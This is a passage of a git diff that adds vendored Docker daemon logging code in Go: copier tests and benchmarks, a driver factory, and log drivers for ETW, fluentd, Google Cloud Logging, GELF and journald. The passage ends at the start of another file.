"stderr") + } + if msg.Source == "stdout" { + if string(msg.Line) != stdoutLongLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line) + } + } + if msg.Source == "stderr" { + if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line) + } + } + } +} + +func TestCopierSlow(t *testing.T) { + stdoutLine := "Line that thinks that it is log line from docker stdout" + var stdout bytes.Buffer + for i := 0; i < 30; i++ { + if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil { + t.Fatal(err) + } + } + + var jsonBuf bytes.Buffer + //encoder := &encodeCloser{Encoder: json.NewEncoder(&jsonBuf)} + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf), delay: 100 * time.Millisecond} + + c := NewCopier(map[string]io.Reader{"stdout": &stdout}, jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + <-time.After(150 * time.Millisecond) + c.Close() + select { + case <-time.After(200 * time.Millisecond): + t.Fatalf("failed to exit in time after the copier is closed") + case <-wait: + } +} + +type BenchmarkLoggerDummy struct { +} + +func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil } + +func (l *BenchmarkLoggerDummy) Close() error { return nil } + +func (l *BenchmarkLoggerDummy) Name() string { return "dummy" } + +func BenchmarkCopier64(b *testing.B) { + benchmarkCopier(b, 1<<6) +} +func BenchmarkCopier128(b *testing.B) { + benchmarkCopier(b, 1<<7) +} +func BenchmarkCopier256(b *testing.B) { + benchmarkCopier(b, 1<<8) +} +func BenchmarkCopier512(b *testing.B) { + benchmarkCopier(b, 1<<9) +} +func BenchmarkCopier1K(b *testing.B) { + benchmarkCopier(b, 1<<10) +} +func BenchmarkCopier2K(b *testing.B) { + benchmarkCopier(b, 1<<11) +} +func BenchmarkCopier4K(b *testing.B) { + benchmarkCopier(b, 1<<12) +} +func BenchmarkCopier8K(b *testing.B) { + benchmarkCopier(b, 1<<13) +} +func BenchmarkCopier16K(b *testing.B) { + benchmarkCopier(b, 1<<14) +} +func BenchmarkCopier32K(b *testing.B) { + benchmarkCopier(b, 1<<15) +} +func BenchmarkCopier64K(b *testing.B) { + benchmarkCopier(b, 1<<16) +} +func BenchmarkCopier128K(b *testing.B) { + benchmarkCopier(b, 1<<17) +} +func BenchmarkCopier256K(b *testing.B) { + benchmarkCopier(b, 1<<18) +} + +func piped(b *testing.B, iterations int, delay time.Duration, buf []byte) io.Reader { + r, w, err := os.Pipe() + if err != nil { + b.Fatal(err) + return nil + } + go func() { + for i := 0; i < iterations; i++ { + time.Sleep(delay) + if n, err := w.Write(buf); err != nil || n != len(buf) { + if err != nil { + b.Fatal(err) + } + b.Fatal(fmt.Errorf("short write")) + } + } + w.Close() + }() + return r +} + +func benchmarkCopier(b *testing.B, length int) { + b.StopTimer() + buf := []byte{'A'} + for len(buf) < length { + buf = append(buf, buf...) + } + buf = append(buf[:length-1], []byte{'\n'}...) + b.StartTimer() + for i := 0; i < b.N; i++ { + c := NewCopier( + map[string]io.Reader{ + "buffer": piped(b, 10, time.Nanosecond, buf), + }, + &BenchmarkLoggerDummy{}) + c.Run() + c.Wait() + c.Close() + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go new file mode 100644 index 0000000000..f296d7f165 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go @@ -0,0 +1,170 @@ +// Package etwlogs provides a log driver for forwarding container logs +// as ETW events.(ETW stands for Event Tracing for Windows) +// A client can then create an ETW listener to listen for events that are sent +// by the ETW provider that we register, using the provider's GUID "a3693192-9ed6-46d2-a981-f8226c8363bd". +// Here is an example of how to do this using the logman utility: +// 1. logman start -ets DockerContainerLogs -p {a3693192-9ed6-46d2-a981-f8226c8363bd} 0 0 -o trace.etl +// 2. Run container(s) and generate log messages +// 3. logman stop -ets DockerContainerLogs +// 4. You can then convert the etl log file to XML using: tracerpt -y trace.etl +// +// Each container log message generates an ETW event that also contains: +// the container name and ID, the timestamp, and the stream type. +package etwlogs + +import ( + "errors" + "fmt" + "sync" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "golang.org/x/sys/windows" +) + +type etwLogs struct { + containerName string + imageName string + containerID string + imageID string +} + +const ( + name = "etwlogs" + win32CallSuccess = 0 +) + +var ( + modAdvapi32 = windows.NewLazySystemDLL("Advapi32.dll") + procEventRegister = modAdvapi32.NewProc("EventRegister") + procEventWriteString = modAdvapi32.NewProc("EventWriteString") + procEventUnregister = modAdvapi32.NewProc("EventUnregister") +) +var providerHandle syscall.Handle +var refCount int +var mu sync.Mutex + +func init() { + providerHandle = syscall.InvalidHandle + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } +} + +// New creates a new etwLogs logger for the given container and registers the EWT provider. +func New(ctx logger.Context) (logger.Logger, error) { + if err := registerETWProvider(); err != nil { + return nil, err + } + logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID) + + return &etwLogs{ + containerName: fixContainerName(ctx.ContainerName), + imageName: ctx.ContainerImageName, + containerID: ctx.ContainerID, + imageID: ctx.ContainerImageID, + }, nil +} + +// Log logs the message to the ETW stream. +func (etwLogger *etwLogs) Log(msg *logger.Message) error { + if providerHandle == syscall.InvalidHandle { + // This should never be hit, if it is, it indicates a programming error. + errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered." + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return callEventWriteString(createLogMessage(etwLogger, msg)) +} + +// Close closes the logger by unregistering the ETW provider. +func (etwLogger *etwLogs) Close() error { + unregisterETWProvider() + return nil +} + +func (etwLogger *etwLogs) Name() string { + return name +} + +func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string { + return fmt.Sprintf("container_name: %s, image_name: %s, container_id: %s, image_id: %s, source: %s, log: %s", + etwLogger.containerName, + etwLogger.imageName, + etwLogger.containerID, + etwLogger.imageID, + msg.Source, + msg.Line) +} + +// fixContainerName removes the initial '/' from the container name. +func fixContainerName(cntName string) string { + if len(cntName) > 0 && cntName[0] == '/' { + cntName = cntName[1:] + } + return cntName +} + +func registerETWProvider() error { + mu.Lock() + defer mu.Unlock() + if refCount == 0 { + var err error + if err = callEventRegister(); err != nil { + return err + } + } + + refCount++ + return nil +} + +func unregisterETWProvider() { + mu.Lock() + defer mu.Unlock() + if refCount == 1 { + if callEventUnregister() { + refCount-- + providerHandle = syscall.InvalidHandle + } + // Not returning an error if EventUnregister fails, because etwLogs will continue to work + } else { + refCount-- + } +} + +func callEventRegister() error { + // The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd} + guid := syscall.GUID{ + 0xa3693192, 0x9ed6, 0x46d2, + [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, + } + + ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle))) + if ret != win32CallSuccess { + errorMessage := fmt.Sprintf("Failed to register ETW provider. Error: %d", ret) + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return nil +} + +func callEventWriteString(message string) error { + ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message)))) + if ret != win32CallSuccess { + errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. Error: %d", ret) + logrus.Error(errorMessage) + return errors.New(errorMessage) + } + return nil +} + +func callEventUnregister() bool { + ret, _, _ := procEventUnregister.Call(uintptr(providerHandle)) + if ret != win32CallSuccess { + return false + } + return true +} diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go new file mode 100644 index 0000000000..9cf716b09a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/factory.go @@ -0,0 +1,104 @@ +package logger + +import ( + "fmt" + "sync" +) + +// Creator builds a logging driver instance with given context. +type Creator func(Context) (Logger, error) + +// LogOptValidator checks the options specific to the underlying +// logging implementation. +type LogOptValidator func(cfg map[string]string) error + +type logdriverFactory struct { + registry map[string]Creator + optValidator map[string]LogOptValidator + m sync.Mutex +} + +func (lf *logdriverFactory) register(name string, c Creator) error { + if lf.driverRegistered(name) { + return fmt.Errorf("logger: log driver named '%s' is already registered", name) + } + + lf.m.Lock() + lf.registry[name] = c + lf.m.Unlock() + return nil +} + +func (lf *logdriverFactory) driverRegistered(name string) bool { + lf.m.Lock() + _, ok := lf.registry[name] + lf.m.Unlock() + return ok +} + +func (lf *logdriverFactory) registerLogOptValidator(name string, l LogOptValidator) error { + lf.m.Lock() + defer lf.m.Unlock() + + if _, ok := lf.optValidator[name]; ok { + return fmt.Errorf("logger: log validator named '%s' is already registered", name) + } + lf.optValidator[name] = l + return nil +} + +func (lf *logdriverFactory) get(name string) (Creator, error) { + lf.m.Lock() + defer lf.m.Unlock() + + c, ok := lf.registry[name] + if !ok { + return c, fmt.Errorf("logger: no log driver named '%s' is registered", name) + } + return c, nil +} + +func (lf *logdriverFactory) getLogOptValidator(name string) LogOptValidator { + lf.m.Lock() + defer lf.m.Unlock() + + c, _ := lf.optValidator[name] + return c +} + +var factory = &logdriverFactory{registry: make(map[string]Creator), optValidator: make(map[string]LogOptValidator)} // global factory instance + +// RegisterLogDriver registers the given logging driver builder with given logging +// driver name. +func RegisterLogDriver(name string, c Creator) error { + return factory.register(name, c) +} + +// RegisterLogOptValidator registers the logging option validator with +// the given logging driver name. +func RegisterLogOptValidator(name string, l LogOptValidator) error { + return factory.registerLogOptValidator(name, l) +} + +// GetLogDriver provides the logging driver builder for a logging driver name. +func GetLogDriver(name string) (Creator, error) { + return factory.get(name) +} + +// ValidateLogOpts checks the options for the given log driver. The +// options supported are specific to the LogDriver implementation. +func ValidateLogOpts(name string, cfg map[string]string) error { + if name == "none" { + return nil + } + + if !factory.driverRegistered(name) { + return fmt.Errorf("logger: no log driver named '%s' is registered", name) + } + + validator := factory.getLogOptValidator(name) + if validator != nil { + return validator(cfg) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go new file mode 100644 index 0000000000..a8303cf97b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go @@ -0,0 +1,246 @@ +// Package fluentd provides the log driver for forwarding server logs +// to fluentd endpoints. +package fluentd + +import ( + "fmt" + "math" + "net" + "net/url" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/go-units" + "github.com/fluent/fluent-logger-golang/fluent" + "github.com/pkg/errors" +) + +type fluentd struct { + tag string + containerID string + containerName string + writer *fluent.Fluent + extra map[string]string +} + +type location struct { + protocol string + host string + port int + path string +} + +const ( + name = "fluentd" + + defaultProtocol = "tcp" + defaultHost = "127.0.0.1" + defaultPort = 24224 + defaultBufferLimit = 1024 * 1024 + + // logger tries to reconnect 2**32 - 1 times + // failed (and panic) after 204 years [ 1.5 ** (2**32 - 1) - 1 seconds] + defaultRetryWait = 1000 + defaultMaxRetries = math.MaxInt32 + + addressKey = "fluentd-address" + bufferLimitKey = "fluentd-buffer-limit" + retryWaitKey = "fluentd-retry-wait" + maxRetriesKey = "fluentd-max-retries" + asyncConnectKey = "fluentd-async-connect" +) + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a fluentd logger using the configuration passed in on +// the context. The supported context configuration variable is +// fluentd-address. +func New(ctx logger.Context) (logger.Logger, error) { + loc, err := parseAddress(ctx.Config[addressKey]) + if err != nil { + return nil, err + } + + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + extra := ctx.ExtraAttributes(nil) + + bufferLimit := defaultBufferLimit + if ctx.Config[bufferLimitKey] != "" { + bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey]) + if err != nil { + return nil, err + } + bufferLimit = int(bl64) + } + + retryWait := defaultRetryWait + if ctx.Config[retryWaitKey] != "" { + rwd, err := time.ParseDuration(ctx.Config[retryWaitKey]) + if err != nil { + return nil, err + } + retryWait = int(rwd.Seconds() * 1000) + } + + maxRetries := defaultMaxRetries + if ctx.Config[maxRetriesKey] != "" { + mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize) + if err != nil { + return nil, err + } + maxRetries = int(mr64) + } + + asyncConnect := false + if ctx.Config[asyncConnectKey] != "" { + if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil { + return nil, err + } + } + + fluentConfig := fluent.Config{ + FluentPort: loc.port, + FluentHost: loc.host, + FluentNetwork: loc.protocol, + FluentSocketPath: loc.path, + BufferLimit: bufferLimit, + RetryWait: retryWait, + MaxRetry: maxRetries, + AsyncConnect: asyncConnect, + } + + logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig). + Debug("logging driver fluentd configured") + + log, err := fluent.New(fluentConfig) + if err != nil { + return nil, err + } + return &fluentd{ + tag: tag, + containerID: ctx.ContainerID, + containerName: ctx.ContainerName, + writer: log, + extra: extra, + }, nil +} + +func (f *fluentd) Log(msg *logger.Message) error { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + // fluent-logger-golang buffers logs from failures and disconnections, + // and these are transferred again automatically. + return f.writer.PostWithTime(f.tag, msg.Timestamp, data) +} + +func (f *fluentd) Close() error { + return f.writer.Close() +} + +func (f *fluentd) Name() string { + return name +} + +// ValidateLogOpt looks for fluentd specific log option fluentd-address. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "tag": + case addressKey: + case bufferLimitKey: + case retryWaitKey: + case maxRetriesKey: + case asyncConnectKey: + // Accepted + default: + return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key) + } + } + + if _, err := parseAddress(cfg["fluentd-address"]); err != nil { + return err + } + + return nil +} + +func parseAddress(address string) (*location, error) { + if address == "" { + return &location{ + protocol: defaultProtocol, + host: defaultHost, + port: defaultPort, + path: "", + }, nil + } + + protocol := defaultProtocol + givenAddress := address + if urlutil.IsTransportURL(address) { + url, err := url.Parse(address) + if err != nil { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + // unix and unixgram socket + if url.Scheme == "unix" || url.Scheme == "unixgram" { + return &location{ + protocol: url.Scheme, + host: "", + port: 0, + path: url.Path, + }, nil + } + // tcp|udp + protocol = url.Scheme + address = url.Host + } + + host, port, err := net.SplitHostPort(address) + if err != nil { + if !strings.Contains(err.Error(), "missing port in address") { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + return &location{ + protocol: protocol, + host: host, + port: defaultPort, + path: "", + }, nil + } + + portnum, err := strconv.Atoi(port) + if err != nil { + return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress) + } + return &location{ + protocol: protocol, + host: host, + port: portnum, + path: "", + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go new file mode 100644 index 0000000000..9a8c1c903f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go @@ -0,0 +1,200 @@ +package gcplogs + +import ( + "fmt" + "sync" + "sync/atomic" + "time" + + "github.com/docker/docker/daemon/logger" + + "github.com/Sirupsen/logrus" + "golang.org/x/net/context" + "google.golang.org/cloud/compute/metadata" + "google.golang.org/cloud/logging" +) + +const ( + name = "gcplogs" + + projectOptKey = "gcp-project" + logLabelsKey = "labels" + logEnvKey = "env" + logCmdKey = "gcp-log-cmd" + logZoneKey = "gcp-meta-zone" + logNameKey = "gcp-meta-name" + logIDKey = "gcp-meta-id" +) + +var ( + // The number of logs the gcplogs driver has dropped. + droppedLogs uint64 + + onGCE bool + + // instance metadata populated from the metadata server if available + projectID string + zone string + instanceName string + instanceID string +) + +func init() { + + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + + if err := logger.RegisterLogOptValidator(name, ValidateLogOpts); err != nil { + logrus.Fatal(err) + } +} + +type gcplogs struct { + client *logging.Client + instance *instanceInfo + container *containerInfo +} + +type dockerLogEntry struct { + Instance *instanceInfo `json:"instance,omitempty"` + Container *containerInfo `json:"container,omitempty"` + Data string `json:"data,omitempty"` +} + +type instanceInfo struct { + Zone string `json:"zone,omitempty"` + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` +} + +type containerInfo struct { + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` + ImageName string `json:"imageName,omitempty"` + ImageID string `json:"imageId,omitempty"` + Created time.Time `json:"created,omitempty"` + Command string `json:"command,omitempty"` + Metadata map[string]string `json:"metadata,omitempty"` +} + +var initGCPOnce sync.Once + +func initGCP() { + initGCPOnce.Do(func() { + onGCE = metadata.OnGCE() + if onGCE { + // These will fail on instances if the metadata service is + // down or the client is compiled with an API version that + // has been removed. Since these are not vital, let's ignore + // them and make their fields in the dockeLogEntry ,omitempty + projectID, _ = metadata.ProjectID() + zone, _ = metadata.Zone() + instanceName, _ = metadata.InstanceName() + instanceID, _ = metadata.InstanceID() + } + }) +} + +// New creates a new logger that logs to Google Cloud Logging using the application +// default credentials. +// +// See https://developers.google.com/identity/protocols/application-default-credentials +func New(ctx logger.Context) (logger.Logger, error) { + initGCP() + + var project string + if projectID != "" { + project = projectID + } + if projectID, found := ctx.Config[projectOptKey]; found { + project = projectID + } + if project == "" { + return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project") + } + + c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver") + if err != nil { + return nil, err + } + + if err := c.Ping(); err != nil { + return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err) + } + + l := &gcplogs{ + client: c, + container: &containerInfo{ + Name: ctx.ContainerName, + ID: ctx.ContainerID, + ImageName: ctx.ContainerImageName, + ImageID: ctx.ContainerImageID, + Created: ctx.ContainerCreated, + Metadata: ctx.ExtraAttributes(nil), + }, + } + + if ctx.Config[logCmdKey] == "true" { + l.container.Command = ctx.Command() + } + + if onGCE { + l.instance = &instanceInfo{ + Zone: zone, + Name: instanceName, + ID: instanceID, + } + } else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" { + l.instance = &instanceInfo{ + Zone: ctx.Config[logZoneKey], + Name: ctx.Config[logNameKey], + ID: ctx.Config[logIDKey], + } + } + + // The logger "overflows" at a rate of 10,000 logs per second and this + // overflow func is called. We want to surface the error to the user + // without overly spamming /var/log/docker.log so we log the first time + // we overflow and every 1000th time after. + c.Overflow = func(_ *logging.Client, _ logging.Entry) error { + if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { + logrus.Errorf("gcplogs driver has dropped %v logs", i) + } + return nil + } + + return l, nil +} + +// ValidateLogOpts validates the opts passed to the gcplogs driver. Currently, the gcplogs +// driver doesn't take any arguments. +func ValidateLogOpts(cfg map[string]string) error { + for k := range cfg { + switch k { + case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey: + default: + return fmt.Errorf("%q is not a valid option for the gcplogs driver", k) + } + } + return nil +} + +func (l *gcplogs) Log(m *logger.Message) error { + return l.client.Log(logging.Entry{ + Time: m.Timestamp, + Payload: &dockerLogEntry{ + Instance: l.instance, + Container: l.container, + Data: string(m.Line), + }, + }) +} + +func (l *gcplogs) Close() error { + return l.client.Flush() +} + +func (l *gcplogs) Name() string { + return name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go new file mode 100644 index 0000000000..95860ac083 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go @@ -0,0 +1,209 @@ +// +build linux + +// Package gelf provides the log driver for forwarding server logs to +// endpoints that support the Graylog Extended Log Format. +package gelf + +import ( + "bytes" + "compress/flate" + "encoding/json" + "fmt" + "net" + "net/url" + "strconv" + "time" + + "github.com/Graylog2/go-gelf/gelf" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" +) + +const name = "gelf" + +type gelfLogger struct { + writer *gelf.Writer + ctx logger.Context + hostname string + rawExtra json.RawMessage +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a gelf logger using the configuration passed in on the +// context. The supported context configuration variable is gelf-address. +func New(ctx logger.Context) (logger.Logger, error) { + // parse gelf address + address, err := parseAddress(ctx.Config["gelf-address"]) + if err != nil { + return nil, err + } + + // collect extra data for GELF message + hostname, err := ctx.Hostname() + if err != nil { + return nil, fmt.Errorf("gelf: cannot access hostname to set source field") + } + + // remove trailing slash from container name + containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/") + + // parse log tag + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + extra := map[string]interface{}{ + "_container_id": ctx.ContainerID, + "_container_name": string(containerName), + "_image_id": ctx.ContainerImageID, + "_image_name": ctx.ContainerImageName, + "_command": ctx.Command(), + "_tag": tag, + "_created": ctx.ContainerCreated, + } + + extraAttrs := ctx.ExtraAttributes(func(key string) string { + if key[0] == '_' { + return key + } + return "_" + key + }) + for k, v := range extraAttrs { + extra[k] = v + } + + rawExtra, err := json.Marshal(extra) + if err != nil { + return nil, err + } + + // create new gelfWriter + gelfWriter, err := gelf.NewWriter(address) + if err != nil { + return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) + } + + if v, ok := ctx.Config["gelf-compression-type"]; ok { + switch v { + case "gzip": + gelfWriter.CompressionType = gelf.CompressGzip + case "zlib": + gelfWriter.CompressionType = gelf.CompressZlib + case "none": + gelfWriter.CompressionType = gelf.CompressNone + default: + return nil, fmt.Errorf("gelf: invalid compression type %q", v) + } + } + + if v, ok := ctx.Config["gelf-compression-level"]; ok { + val, err := strconv.Atoi(v) + if err != nil { + return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err) + } + gelfWriter.CompressionLevel = val + } + + return &gelfLogger{ + writer: gelfWriter, + ctx: ctx, + hostname: hostname, + rawExtra: rawExtra, + }, nil +} + +func (s *gelfLogger) Log(msg *logger.Message) error { + level := gelf.LOG_INFO + if msg.Source == "stderr" { + level = gelf.LOG_ERR + } + + m := gelf.Message{ + Version: "1.1", + Host: s.hostname, + Short: string(msg.Line), + TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0, + Level: level, + RawExtra: s.rawExtra, + } + + if err := s.writer.WriteMessage(&m); err != nil { + return fmt.Errorf("gelf: cannot send GELF message: %v", err) + } + return nil +} + +func (s *gelfLogger) Close() error { + return s.writer.Close() +} + +func (s *gelfLogger) Name() string { + return name +} + +// ValidateLogOpt looks for gelf specific log option gelf-address. +func ValidateLogOpt(cfg map[string]string) error { + for key, val := range cfg { + switch key { + case "gelf-address": + case "tag": + case "labels": + case "env": + case "gelf-compression-level": + i, err := strconv.Atoi(val) + if err != nil || i < flate.DefaultCompression || i > flate.BestCompression { + return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) + } + case "gelf-compression-type": + switch val { + case "gzip", "zlib", "none": + default: + return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) + } + default: + return fmt.Errorf("unknown log opt %q for gelf log driver", key) + } + } + + if _, err := parseAddress(cfg["gelf-address"]); err != nil { + return err + } + + return nil +} + +func parseAddress(address string) (string, error) { + if address == "" { + return "", nil + } + if !urlutil.IsTransportURL(address) { + return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address) + } + url, err := url.Parse(address) + if err != nil { + return "", err + } + + // we support only udp + if url.Scheme != "udp" { + return "", fmt.Errorf("gelf: endpoint needs to be UDP") + } + + // get host and port + if _, _, err = net.SplitHostPort(url.Host); err != nil { + return "", fmt.Errorf("gelf: please provide gelf-address as udp://host:port") + } + + return url.Host, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go new file mode 100644 index 0000000000..266f73b18b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package gelf diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go new file mode 100644 index 0000000000..9569859121 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go @@ -0,0 +1,122 @@ +// +build linux + +// Package journald provides the log driver for forwarding server logs +// to endpoints that receive the systemd format. +package journald + +import ( + "fmt" + "sync" + "unicode" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" +) + +const name = "journald" + +type journald struct { + vars map[string]string // additional variables and values to send to the journal along with the log message + readers readerList +} + +type readerList struct { + mu sync.Mutex + readers map[*logger.LogWatcher]*logger.LogWatcher +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, validateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// sanitizeKeyMode returns the sanitized string so that it could be used in journald. +// In journald log, there are special requirements for fields. +// Fields must be composed of uppercase letters, numbers, and underscores, but must +// not start with an underscore. +func sanitizeKeyMod(s string) string { + n := "" + for _, v := range s { + if 'a' <= v && v <= 'z' { + v = unicode.ToUpper(v) + } else if ('Z' < v || v < 'A') && ('9' < v || v < '0') { + v = '_' + } + // If (n == "" && v == '_'), then we will skip as this is the beginning with '_' + if !(n == "" && v == '_') { + n += string(v) + } + } + return n +} + +// New creates a journald logger using the configuration passed in on +// the context. +func New(ctx logger.Context) (logger.Logger, error) { + if !journal.Enabled() { + return nil, fmt.Errorf("journald is not enabled on this host") + } + // Strip a leading slash so that people can search for + // CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo. + name := ctx.ContainerName + if name[0] == '/' { + name = name[1:] + } + + // parse log tag + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + vars := map[string]string{ + "CONTAINER_ID": ctx.ContainerID[:12], + "CONTAINER_ID_FULL": ctx.ContainerID, + "CONTAINER_NAME": name, + "CONTAINER_TAG": tag, + } + extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod) + for k, v := range extraAttrs { + vars[k] = v + } + return &journald{vars: vars, readers: readerList{readers: make(map[*logger.LogWatcher]*logger.LogWatcher)}}, nil +} + +// We don't actually accept any options, but we have to supply a callback for +// the factory to pass the (probably empty) configuration map to. +func validateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "labels": + case "env": + case "tag": + default: + return fmt.Errorf("unknown log opt '%s' for journald log driver", key) + } + } + return nil +} + +func (s *journald) Log(msg *logger.Message) error { + vars := map[string]string{} + for k, v := range s.vars { + vars[k] = v + } + if msg.Partial { + vars["CONTAINER_PARTIAL_MESSAGE"] = "true" + } + if msg.Source == "stderr" { + return journal.Send(string(msg.Line), journal.PriErr, vars) + } + return journal.Send(string(msg.Line), journal.PriInfo, vars) +} + +func (s *journald) Name() string { + return name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go new file mode 100644 index 0000000000..224423fd07 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go @@ -0,0 +1,23 @@ +// +build linux + +package journald + +import ( + "testing" +) + +func TestSanitizeKeyMod(t *testing.T) { + entries := map[string]string{ + "io.kubernetes.pod.name": "IO_KUBERNETES_POD_NAME", + "io?.kubernetes.pod.name": "IO__KUBERNETES_POD_NAME", + "?io.kubernetes.pod.name": "IO_KUBERNETES_POD_NAME", + "io123.kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + "_io123.kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + "__io123_kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + } + for k, v := range entries { + if sanitizeKeyMod(k) != v { + t.Fatalf("Failed to sanitize %s, got %s, expected %s", k, sanitizeKeyMod(k), v) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go new file mode 100644 index 0000000000..d52ca92e4f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go @@ -0,0 +1,6 @@ +// +build !linux + +package journald + +type journald struct { +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go new file mode 100644 index 0000000000..d91eb809bc --- 